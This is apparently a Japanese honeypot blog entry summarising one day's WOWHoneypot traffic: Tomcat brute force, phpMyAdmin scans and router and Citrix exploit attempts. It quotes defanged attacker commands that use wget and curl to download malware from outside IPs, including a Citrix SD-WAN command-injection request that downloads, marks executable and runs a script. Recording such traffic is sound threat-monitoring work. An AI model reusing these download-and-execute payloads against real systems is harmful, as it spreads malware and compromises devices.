23log

WOWHoneypotで観測した日々のログをつらつらと

トップ > Honeypot > WOWHoneypot観察(275日目)

WOWHoneypot観察(275日目)

Honeypot

2019/12/16(月)

トータルは4036件でした。

ハンティングログは以下です。

149.200.148[.]89 wget+hxxp[:]//185.172.110[.]220/mipsel

www.virustotal.com
www.virustotal.com

149.202.251[.]78 wget hxxp[:]//80.82.64.14/richard; curl -O hxxp[:]//80.82.64[.]14/richard
149.202.251[.]78 curl -O hxxp[:]//80.82.64[.]14/richard

www.virustotal.com

件数 概要 リクエス
4002 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
19 アクセス GET /
2 ZmEuによるphpMyAdminのスキャン GET /w00tw00t.at.blackhats.romanian.anti-sec:)
2 ZmEuによるphpMyAdminのスキャン GET /pma/scripts/setup.php
2 ZmEuによるphpMyAdminのスキャン GET /phpmyadmin/scripts/setup.php
2 ZmEuによるphpMyAdminのスキャン GET /myadmin/scripts/setup.php
1 ZmEuによるphpMyAdminのスキャン GET /phpMyAdmin/scripts/setup.php
1 ZmEuによるphpMyAdminのスキャン GET /MyAdmin/scripts/setup.php
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 Citrix SD-WAN Applianceの脆弱性を狙った通信 POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`'%20%%2099999;%20wget%20hxxp[:]//80.82.64.14/richard;%20curl%20-O%20hxxp[:]//80.82.64.14/richard;%20chmod%20+x%20richard;%20sh%20richard
1 クローリング HEAD /robots.txt
1 Webshell設置の調査 GET /external.php
1 phpMyAdminの調査 GET /admin/connection/